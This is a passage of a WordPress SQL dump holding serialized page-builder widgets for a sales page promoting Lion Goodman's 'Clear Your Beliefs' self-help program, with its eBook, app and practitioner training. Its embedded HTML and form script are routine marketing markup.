width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong>\n\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I want to experience?\n- What belief is creating this experience I don''t want?\n- How can I change my beliefs so I can change my experience?\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em, our free app.\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier.  The resistance and blocks that have held you back just melt away ­­– like magic.  And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy?  And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:508:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the &lt;em&gt;Clear Your Beliefs&lt;/em process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1132, 1616, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:437:"<center style="margin-top: -122px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:730:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n</center>\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n<center style="margin-top: -14px;">\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:804:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 52px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPHONE APP[/su_button]\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPAD APP[/su_button]\n<p style="font-size: 10px; text-align: center;">iClearIt is not yet available for Android or other platforms.</p>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:728:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg"></div>\n<p style="text-align: center;"> <big><strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong></big>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence</center>\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 70px;"><strong>\n[su_button url="#" background="#253aa4" size="9"]LEARN MORE[/su_button] [/su_box]</strong>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1513:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<p style="font-size: 1.1em; margin-left: -10px; margin-bottom: -14px;"><b>The <em>Clear Your Beliefs</em> Program… and  How and Why…</b></p>\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<p style="font-size: 1.1em; margin-left: -10px; margin-bottom: 14px;"><b>How and Why It Works So Well</b></p>\n\n<ul>\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2708:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong>\n\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I want to experience?\n- What belief is creating this experience I don''t want?\n- How can I change my beliefs so I can change my experience?\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em, our free app.\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier.  The resistance and blocks that have held you back just melt away ­­– like magic.  And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy?  And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:508:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the &lt;em&gt;Clear Your Beliefs&lt;/em process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
(1138, 1621, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:437:"<center style="margin-top: -122px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:730:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n</center>\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n<center style="margin-top: -14px;">\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:804:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 52px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPHONE APP[/su_button]\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPAD APP[/su_button]\n<p style="font-size: 10px; text-align: center;">iClearIt is not yet available for Android or other platforms.</p>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:728:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg"></div>\n<p style="text-align: center;"> <big><strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong></big>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence</center>\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 70px;"><strong>\n[su_button url="#" background="#253aa4" size="9"]LEARN MORE[/su_button] [/su_box]</strong>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1517:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<p style="font-size: 1.1em; margin-left: -10px; margin-bottom: -23px !important;"><b>The <em>Clear Your Beliefs</em> Program… and  How and Why…</b></p>\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<p style="margin-left: -10px; margin-bottom: 14px !important;"><b>How and Why It Works So Well</b></p>\n\n<ul>\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2637:"<div id="divStroke">\n<p style="font-size: 1.1em;"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I…\n- What belief…\n- How can I…\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em, our free app.\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier.  The resistance and blocks that have held you back just melt away ­­– like magic.  And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy?  And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:508:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the &lt;em&gt;Clear Your Beliefs&lt;/em process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
(1133, 1617, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:437:"<center style="margin-top: -122px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:730:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n</center>\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n<center style="margin-top: -14px;">\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:804:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 52px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPHONE APP[/su_button]\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPAD APP[/su_button]\n<p style="font-size: 10px; text-align: center;">iClearIt is not yet available for Android or other platforms.</p>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:728:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg"></div>\n<p style="text-align: center;"> <big><strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong></big>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence</center>\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 70px;"><strong>\n[su_button url="#" background="#253aa4" size="9"]LEARN MORE[/su_button] [/su_box]</strong>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1517:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<p style="font-size: 1.1em; margin-left: -10px; margin-bottom: -14px !important;"><b>The <em>Clear Your Beliefs</em> Program… and  How and Why…</b></p>\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true 